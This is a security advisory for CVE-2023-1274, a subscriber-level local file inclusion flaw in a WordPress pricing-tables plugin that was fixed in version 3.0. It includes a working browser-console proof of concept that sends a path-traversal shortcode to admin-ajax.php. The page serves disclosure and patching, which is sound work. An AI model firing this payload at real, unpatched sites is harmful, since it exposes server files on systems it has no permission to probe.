Pricing Tables For WPBakery Page Builder < 3.0 – Subscriber+ LFI | CVE 2023-1274 | Plugin Vulnerabilities

Description

The plugin does not validate some shortcode attributes before using them to generate paths passed to include function/s, allowing any authenticated users such as subscriber to perform LFI attacks

Proof of Concept

Run the below command in the developer console of the web browser while being on the blog as a subscriber user

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": "action=parse-media-shortcode&shortcode=[vca_pricing_plans_child vca_pp_styles='/../../../../index']",
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

Affects Plugins

pricing-tables-for-wpbakery-page-builder

Fixed in 3.0

References

CVE

Classification

Type

TRAVERSAL

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Lana Codes

Submitter

Lana Codes

Submitter website

https://lana.codes/

Submitter twitter

Verified

Yes

WPVDB ID

267acb2c-1a95-487f-a714-516de05d2b2f

Timeline

Publicly Published

2023-03-22 (about 1 years ago)

Added

2023-03-22 (about 1 years ago)

Last Updated

2023-03-22 (about 1 years ago)

Other

Published

Title

Published

2019-07-23

Title

WPS Child Themes Generator <= 1.1 - Path Traversal

Published

2023-03-08

Title

Drag and Drop Multiple File Upload PRO - Contact Form 7 Standard < 2.11.0 - Path Traversal

Published

2020-05-16

Title

Simple File List < 4.2.8 - Authenticated Arbitrary File Deletion

Published

2023-11-20

Title

File Manager < 6.3 - Admin+ Arbitrary OS File/Folder Access + Path Traversal

Published

2022-10-14

Title

WP All Import < 3.6.9 - Admin+ Directory traversal via file upload